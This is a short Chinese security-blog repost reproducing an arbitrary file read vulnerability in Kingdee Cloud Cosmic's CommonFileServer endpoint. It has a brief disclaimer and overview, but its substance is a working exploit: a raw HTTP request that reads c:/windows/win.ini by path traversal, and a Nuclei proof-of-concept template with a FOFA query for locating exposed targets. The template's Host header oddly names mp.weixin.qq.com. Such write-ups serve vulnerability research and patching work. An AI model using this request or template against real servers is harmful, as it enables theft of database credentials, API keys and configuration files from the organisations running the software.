「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

admin
admin
admin
102523
文章
87
评论
2024年2月15日11:22:01评论23 views字数 867阅读2分53秒阅读模式

免责声明

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

漏洞概述

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

      金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞,攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

漏洞复现

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

GET /CommonFileServer/c:/windows/win.ini HTTP/1.1Host: accept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

NUCLEI POC

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

id: jindie-K3-cloud-CommonFileServer-file-readinfo:  name: 金蝶云星空 CommonFileServer 任意文件读  author: rain  severity: critical  tags: Kingdee  metadata:     fofa-query: app="金蝶云星空-管理中心"http:  - raw:    - |        GET /CommonFileServer/c:/windows/win.ini HTTP/1.1        Host: mp.weixin.qq.com        Content-Type: application/x-www-form-urlencoded    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "[fonts]")'

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

原文始发于微信公众号(知黑守白):「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日11:22:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「漏洞复现」金蝶云星空 CommonFileServer 任意文件读取https://cn-sec.com/archives/2196314.html

发表评论

匿名网友 填写信息